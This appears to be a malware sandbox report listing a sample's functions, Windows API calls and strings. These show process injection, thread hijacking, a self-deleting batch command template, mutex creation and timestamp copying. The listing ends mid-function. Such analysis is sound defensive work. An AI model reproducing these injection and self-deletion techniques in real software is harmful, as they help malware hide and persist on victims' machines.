APIs

Part of subcall function 00C2E35B: GetTempPathW.KERNEL32(00000104,?), ref: 00C2E376
Part of subcall function 00C2E35B: PathAddBackslashW.SHLWAPI(?), ref: 00C2E3A0
Part of subcall function 00C2E35B: CreateDirectoryW.KERNEL32(?), ref: 00C2E457
Part of subcall function 00C2E35B: SetFileAttributesW.KERNEL32(?), ref: 00C2E468
Part of subcall function 00C2E35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00C2E481
Part of subcall function 00C2E35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00C2E492

CharToOemW.USER32(?,?), ref: 00C354C8
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00C354FF

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CloseHandle.KERNEL32(000000FF), ref: 00C35527
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00C35569
memset.MSVCRT ref: 00C3557E
CloseHandle.KERNEL32(000000FF), ref: 00C355B9

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Strings

.bat, xrefs: 00C3549C
@echo off%sdel /F "%s", xrefs: 00C354D9
/c "%s", xrefs: 00C35534
ComSpec, xrefs: 00C35564
D, xrefs: 00C3559E

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD07D0, Relevance: 16.1, APIs: 9, Instructions: 156

APIs

GetCurrentThreadId.KERNEL32 ref: 00FD07D6
memcpy.MSVCRT ref: 00FD0822
memset.MSVCRT ref: 00FD085A
GetThreadContext.KERNEL32(?,?), ref: 00FD0895
SetThreadContext.KERNEL32(?,?), ref: 00FD0900
GetCurrentProcess.KERNEL32 ref: 00FD0919
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00FD093E
FlushInstructionCache.KERNEL32(?,?,0000007C), ref: 00FD0950

Part of subcall function 00FD0643: memset.MSVCRT ref: 00FD0654

Part of subcall function 00FD03FD: GetCurrentProcess.KERNEL32 ref: 00FD0400
Part of subcall function 00FD03FD: VirtualProtect.KERNEL32(6FFF0000,00010000,00000020,?), ref: 00FD0421
Part of subcall function 00FD03FD: FlushInstructionCache.KERNEL32(?,6FFF0000,00010000), ref: 00FD042A

ResumeThread.KERNEL32(?), ref: 00FD0992

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD072F: GetCurrentThreadId.KERNEL32 ref: 00FD0730
Part of subcall function 00FD072F: VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00FD0767
Part of subcall function 00FD072F: ResumeThread.KERNEL32(?), ref: 00FD07A8

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C44214, Relevance: 15.1, APIs: 5, Strings: 2, Instructions: 97

APIs

EnterCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C4422E
LeaveCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C44261

Part of subcall function 00C3DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00C3DEC9
Part of subcall function 00C3DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00C3DED5
Part of subcall function 00C3DEBB: SetLastError.KERNEL32(00000001,00C442C8,00C62954,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C3DEED

CoTaskMemFree.OLE32(00000000), ref: 00C442F6
PathRemoveBackslashW.SHLWAPI(?), ref: 00C44303
SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00C4431A

Strings

SHGetKnownFolderPath, xrefs: 00C442B9
shell32.dll, xrefs: 00C442BE

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2E717, Relevance: 14.7, APIs: 5, Strings: 2, Instructions: 89

APIs

memcpy.MSVCRT ref: 00C2E775
memcpy.MSVCRT ref: 00C2E78A
memcpy.MSVCRT ref: 00C2E79F
memcpy.MSVCRT ref: 00C2E7AE

Part of subcall function 00C2E301: EnterCriticalSection.KERNEL32(00C63510,?,00C2E5BF,?,00C2E617,?,?,?,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,00000000,00000000,00000000,?,00000000), ref: 00C2E311
Part of subcall function 00C2E301: LeaveCriticalSection.KERNEL32(00C63510,?,00000000,?,00000002,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,C:\Documents and Settings\Administrator\Local Settings\Application Data,?,00C3BE0B,?,?,00000830), ref: 00C2E340

Part of subcall function 00C3DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00C3DEC9
Part of subcall function 00C3DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00C3DED5
Part of subcall function 00C3DEBB: SetLastError.KERNEL32(00000001,00C442C8,00C62954,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C3DEED

SetFileTime.KERNEL32(?,?,?,?), ref: 00C2E813

Strings

SetFileInformationByHandle, xrefs: 00C2E7BD
kernel32.dll, xrefs: 00C2E7C2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C448F2, Relevance: 14.3, APIs: 5, Strings: 2, Instructions: 121

APIs

GetModuleHandleW.KERNEL32 ref: 00C44932

Part of subcall function 00C31791: InitializeCriticalSection.KERNEL32(00C63510), ref: 00C317B1
Part of subcall function 00C31791: InitializeCriticalSection.KERNEL32 ref: 00C317C6
Part of subcall function 00C31791: memset.MSVCRT ref: 00C317DB
Part of subcall function 00C31791: TlsAlloc.KERNEL32(?,00000000,00C44986,?,?,00000001), ref: 00C317F2
Part of subcall function 00C31791: GetModuleHandleW.KERNEL32(?), ref: 00C31817

WSAStartup.WS2_32(00000202,?), ref: 00C44998
CreateEventW.KERNEL32(00C62974,00000001), ref: 00C449BA

Part of subcall function 00C3500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00C35020
Part of subcall function 00C3500E: GetTokenInformation.ADVAPI32(?,0000000C,00C62968,00000004,?), ref: 00C35048
Part of subcall function 00C3500E: CloseHandle.KERNEL32(?), ref: 00C3505E

GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 00C449EC

Part of subcall function 00C446CB: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C4470E

GetCurrentProcessId.KERNEL32 ref: 00C44A17

Part of subcall function 00C4472D: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00C44777
Part of subcall function 00C4472D: lstrcmpiW.KERNEL32(?,?), ref: 00C447A6

Part of subcall function 00C447E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C44819
Part of subcall function 00C447E5: lstrcatW.KERNEL32(?,.dat), ref: 00C44879
Part of subcall function 00C447E5: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C4489E
Part of subcall function 00C447E5: ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 00C448BB
Part of subcall function 00C447E5: CloseHandle.KERNEL32 ref: 00C448C8

Part of subcall function 00C440F3: IsBadReadPtr.KERNEL32 ref: 00C4412C

Strings

GetProcAddress, xrefs: 00C44941
LoadLibraryA, xrefs: 00C4494D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE47E5, Relevance: 14.3, APIs: 5, Strings: 2, Instructions: 93

APIs

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FE4819

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

lstrcatW.KERNEL32(?,.dat), ref: 00FE4879
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE489E
ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 00FE48BB
CloseHandle.KERNEL32 ref: 00FE48C8

Part of subcall function 00FD1905: EnterCriticalSection.KERNEL32(01111E90,00000000,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD1913
Part of subcall function 00FD1905: GetFileVersionInfoSizeW.VERSION(01111EF0,?,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD1933
Part of subcall function 00FD1905: GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD1953
Part of subcall function 00FD1905: LeaveCriticalSection.KERNEL32(01111E90,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD19D2

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00FE483A
.dat, xrefs: 00FE486D

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C5358E, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 64

APIs

InitializeSecurityDescriptor.ADVAPI32(00C62980,00000001), ref: 00C5359E
SetSecurityDescriptorDacl.ADVAPI32(00C62980,00000001,00000000,00000000), ref: 00C535AF
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00C535C5
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00C535E1
SetSecurityDescriptorSacl.ADVAPI32(00C62980,?,00000001,?), ref: 00C535F5
LocalFree.KERNEL32(?), ref: 00C53607

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 00C535C0

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD043B, Relevance: 12.6, APIs: 7, Instructions: 173

APIs

memset.MSVCRT ref: 00FD04EB
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00FD04FC
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00FD0530
memset.MSVCRT ref: 00FD0570
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00FD0581
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00FD05C1
memset.MSVCRT ref: 00FD062C

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4B9D8, Relevance: 12.3, APIs: 5, Strings: 1, Instructions: 91

APIs

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

PathIsDirectoryW.SHLWAPI(?), ref: 00C4BA0E
CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 00C4BA30

Part of subcall function 00C4B883: memcpy.MSVCRT ref: 00C4B9B6

GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 00C4BA76

Part of subcall function 00C2E717: memcpy.MSVCRT ref: 00C2E775
Part of subcall function 00C2E717: memcpy.MSVCRT ref: 00C2E78A
Part of subcall function 00C2E717: memcpy.MSVCRT ref: 00C2E79F
Part of subcall function 00C2E717: memcpy.MSVCRT ref: 00C2E7AE
Part of subcall function 00C2E717: SetFileTime.KERNEL32(?,?,?,?), ref: 00C2E813

CloseHandle.KERNEL32 ref: 00C4BA95
PathRemoveFileSpecW.SHLWAPI ref: 00C4BAA2

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C4B9DE

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2E35B, Relevance: 11.3, APIs: 6, Instructions: 129

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00C2E376
PathAddBackslashW.SHLWAPI(?), ref: 00C2E3A0

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

CreateDirectoryW.KERNEL32(?), ref: 00C2E457
SetFileAttributesW.KERNEL32(?), ref: 00C2E468
CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00C2E481
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00C2E492

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD09C2, Relevance: 11.1, APIs: 5, Instructions: 210

APIs

GetCurrentThreadId.KERNEL32 ref: 00FD09D3

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

Part of subcall function 00FD043B: memset.MSVCRT ref: 00FD04EB
Part of subcall function 00FD043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00FD04FC
Part of subcall function 00FD043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00FD0530
Part of subcall function 00FD043B: memset.MSVCRT ref: 00FD0570
Part of subcall function 00FD043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00FD0581
Part of subcall function 00FD043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00FD05C1
Part of subcall function 00FD043B: memset.MSVCRT ref: 00FD062C

Part of subcall function 00FC9BA9: SetLastError.KERNEL32(0000000D), ref: 00FC9BE4

memcpy.MSVCRT ref: 00FD0B42
memset.MSVCRT ref: 00FD0BA8
VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00FD0BBD
GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00FD0BC7

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD0643: memset.MSVCRT ref: 00FD0654

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C31B16, Relevance: 10.9, APIs: 6, Instructions: 65

APIs

CreateFileW.KERNEL32(00F41EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C31B2F
GetFileSizeEx.KERNEL32(?,?), ref: 00C31B42
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00C31B68
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C31B80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31B9E
CloseHandle.KERNEL32 ref: 00C31BA7

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4BBA1, Relevance: 10.9, APIs: 6, Instructions: 57

APIs

Part of subcall function 00C44214: EnterCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C4422E
Part of subcall function 00C44214: LeaveCriticalSection.KERNEL32(00C63510,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C44261
Part of subcall function 00C44214: CoTaskMemFree.OLE32(00000000), ref: 00C442F6
Part of subcall function 00C44214: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44303
Part of subcall function 00C44214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00C4431A

PathRemoveBackslashW.SHLWAPI ref: 00C4BBCD
PathRemoveFileSpecW.SHLWAPI ref: 00C4BBDA
PathAddBackslashW.SHLWAPI ref: 00C4BBEB
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 00C4BBFE
CLSIDFromString.OLE32(?,00C62DB4,?,?,00000064,?,?,?,?,?,00000064,?,00C62DB4,?,?,00000000), ref: 00C4BC1A
memset.MSVCRT ref: 00C4BC2C

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C35208, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60

APIs

memset.MSVCRT ref: 00C35229
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 00C35261
memcpy.MSVCRT ref: 00C3527C
CloseHandle.KERNEL32(?), ref: 00C35291
CloseHandle.KERNEL32(?), ref: 00C35297

Strings

D, xrefs: 00C35232

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C506B6, Relevance: 10.3, APIs: 4, Strings: 1, Instructions: 59

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000104,00000000,?,00000000), ref: 00C506D4
RegCreateKeyExW.ADVAPI32(?,00C39821,00000000,00000000,00000000,00000103,00000000,?,?), ref: 00C50709
RegCloseKey.ADVAPI32(?), ref: 00C50718
RegCloseKey.ADVAPI32(?), ref: 00C50733

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C506DE

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4B70A, Relevance: 9.7, APIs: 5, Instructions: 89

APIs

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

NlsGetCacheUpdateCount.KERNEL32(?,00000000), ref: 00C4B783
SetFileAttributesW.KERNEL32(?), ref: 00C4B7A2
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 00C4B7B9
GetLastError.KERNEL32(?,00000002,?,?), ref: 00C4B7C6
CloseHandle.KERNEL32 ref: 00C4B7FF

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE4A6B, Relevance: 9.4, APIs: 5, Instructions: 109

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00FE4A89

Part of subcall function 00FE4159: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00FE4188
Part of subcall function 00FE4159: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00FE41C7
Part of subcall function 00FE4159: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00FE41EE

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00FE4AC4
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FE4B04
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FE4B27

Part of subcall function 00FE45AE: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00FE45D1
Part of subcall function 00FE45AE: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FE45E9
Part of subcall function 00FE45AE: DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00FE4604

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00FE4B77

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FE582C, Relevance: 9.2, APIs: 3, Strings: 1, Instructions: 38

APIs

EnterCriticalSection.KERNEL32(01003510,?,?,?,00FDE9BA), ref: 00FE5842
LeaveCriticalSection.KERNEL32(01003510,?,?,?,00FDE9BA), ref: 00FE5868

Part of subcall function 00FE575A: memset.MSVCRT ref: 00FE5774
Part of subcall function 00FE575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FE57BA

CreateMutexW.KERNEL32(01002974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 00FE587A

Part of subcall function 00FD2F31: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FD2F37
Part of subcall function 00FD2F31: CloseHandle.KERNEL32 ref: 00FD2F49

Strings

Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 00FE586F

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4BC3E, Relevance: 9.1, APIs: 5, Instructions: 172

APIs

memset.MSVCRT ref: 00C4BC73
GetComputerNameW.KERNEL32(?,?), ref: 00C4BCA7
GetVersionExW.KERNEL32(?), ref: 00C4BCD0
memset.MSVCRT ref: 00C4BCEF

Part of subcall function 00C40D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00C40D60

Part of subcall function 00C40D19: RegFlushKey.ADVAPI32 ref: 00C40D29
Part of subcall function 00C40D19: RegCloseKey.ADVAPI32 ref: 00C40D31

Part of subcall function 00C29A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00C29ACA
Part of subcall function 00C29A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00C29AEF

memset.MSVCRT ref: 00C4BDF4

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C29A2A: CryptDestroyHash.ADVAPI32 ref: 00C29A42
Part of subcall function 00C29A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00C29A53

Part of subcall function 00C29B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00C29B41

Part of subcall function 00C40FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00C4BD4B,?), ref: 00C40FF2

Part of subcall function 00C40E64: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C40EBF

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C453C3, Relevance: 9.1, APIs: 6, Instructions: 61

APIs

Part of subcall function 00C448F2: GetModuleHandleW.KERNEL32 ref: 00C44932
Part of subcall function 00C448F2: WSAStartup.WS2_32(00000202,?), ref: 00C44998
Part of subcall function 00C448F2: CreateEventW.KERNEL32(00C62974,00000001), ref: 00C449BA
Part of subcall function 00C448F2: GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 00C449EC
Part of subcall function 00C448F2: GetCurrentProcessId.KERNEL32 ref: 00C44A17

SetErrorMode.KERNEL32(00008007), ref: 00C453DC
GetCommandLineW.KERNEL32 ref: 00C453E8
CommandLineToArgvW.SHELL32 ref: 00C453EF
LocalFree.KERNEL32 ref: 00C4542C
ExitProcess.KERNEL32(00000001), ref: 00C4543D

Part of subcall function 00C45087: CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C4512D
Part of subcall function 00C45087: GetLastError.KERNEL32(?,?,00000001,?,?,?,00C45452), ref: 00C4513D
Part of subcall function 00C45087: CloseHandle.KERNEL32 ref: 00C4514B
Part of subcall function 00C45087: lstrlenW.KERNEL32(?), ref: 00C451AD
Part of subcall function 00C45087: ExitWindowsEx.USER32(00000014,80000000), ref: 00C451DD
Part of subcall function 00C45087: OpenEventW.KERNEL32(00000002,00000000,?), ref: 00C45203
Part of subcall function 00C45087: SetEvent.KERNEL32 ref: 00C45210
Part of subcall function 00C45087: CloseHandle.KERNEL32 ref: 00C45217
Part of subcall function 00C45087: CloseHandle.KERNEL32 ref: 00C45229
Part of subcall function 00C45087: IsWellKnownSid.ADVAPI32(00F41EC0,00000016), ref: 00C45279
Part of subcall function 00C45087: CreateEventW.KERNEL32(00C62974,00000001,00000000,?), ref: 00C45348
Part of subcall function 00C45087: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C45361
Part of subcall function 00C45087: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C45373
Part of subcall function 00C45087: CloseHandle.KERNEL32(00000000), ref: 00C4538A
Part of subcall function 00C45087: CloseHandle.KERNEL32(?), ref: 00C45390
Part of subcall function 00C45087: CloseHandle.KERNEL32(?), ref: 00C45396

Sleep.KERNEL32(000000FF), ref: 00C45463

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD506A, Relevance: 7.2, APIs: 4, Instructions: 38

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00FD507A
Thread32First.KERNEL32(?,?), ref: 00FD5095
Thread32Next.KERNEL32(?,?), ref: 00FD50A8
CloseHandle.KERNEL32 ref: 00FD50B3

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FDEA5E, Relevance: 7.2, APIs: 4, Instructions: 28

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001E9A0,00000000), ref: 00FDEA75
WaitForSingleObject.KERNEL32(?,00003A98), ref: 00FDEA87
TerminateThread.KERNEL32(?,00000000), ref: 00FDEA93
CloseHandle.KERNEL32 ref: 00FDEA9A

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2E6AF, Relevance: 6.4, APIs: 2, Strings: 1, Instructions: 47

APIs

GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 00C2E6BC
CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 00C2E6DC

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Part of subcall function 00C2E5F1: memcpy.MSVCRT ref: 00C2E632
Part of subcall function 00C2E5F1: memcpy.MSVCRT ref: 00C2E645
Part of subcall function 00C2E5F1: memcpy.MSVCRT ref: 00C2E658
Part of subcall function 00C2E5F1: memcpy.MSVCRT ref: 00C2E663
Part of subcall function 00C2E5F1: GetFileTime.KERNEL32(?,?,?), ref: 00C2E687
Part of subcall function 00C2E5F1: memcpy.MSVCRT ref: 00C2E69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C2E6B2 00C2E6B3 00C2E6B9 00C2E6DB

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C37058, Relevance: 5.9, APIs: 3, Instructions: 82

APIs

Part of subcall function 00C3DCF8: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00C3DD10
Part of subcall function 00C3DCF8: CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 00C3DD24
Part of subcall function 00C3DCF8: CloseHandle.KERNEL32 ref: 00C3DD37

GetFileSizeEx.KERNEL32(00000000,?), ref: 00C3708F

Part of subcall function 00C3DD44: UnmapViewOfFile.KERNEL32 ref: 00C3DD50
Part of subcall function 00C3DD44: MapViewOfFile.KERNEL32(?,00000001,00000000,00000000,?), ref: 00C3DD67

Part of subcall function 00C2E524: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 00C2E534

SetEndOfFile.KERNEL32 ref: 00C37105
FlushFileBuffers.KERNEL32(?), ref: 00C37110

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Part of subcall function 00C2E56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C2E594

Part of subcall function 00C36F3F: GetFileAttributesW.KERNEL32(00000000), ref: 00C36F50
Part of subcall function 00C36F3F: PathRemoveFileSpecW.SHLWAPI(?), ref: 00C36F85
Part of subcall function 00C36F3F: MoveFileExW.KERNEL32(00000000,?,00000001), ref: 00C36FCC
Part of subcall function 00C36F3F: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00C36FE5
Part of subcall function 00C36F3F: Sleep.KERNEL32(00001388), ref: 00C37028
Part of subcall function 00C36F3F: FlushFileBuffers.KERNEL32 ref: 00C37036

Part of subcall function 00C3DCB8: UnmapViewOfFile.KERNEL32 ref: 00C3DCC4
Part of subcall function 00C3DCB8: CloseHandle.KERNEL32 ref: 00C3DCD7
Part of subcall function 00C3DCB8: CloseHandle.KERNEL32 ref: 00C3DCED

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FEBE5A, Relevance: 5.8, APIs: 3, Instructions: 36

APIs

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

Part of subcall function 00FEBAD3: memcpy.MSVCRT ref: 00FEBAEE
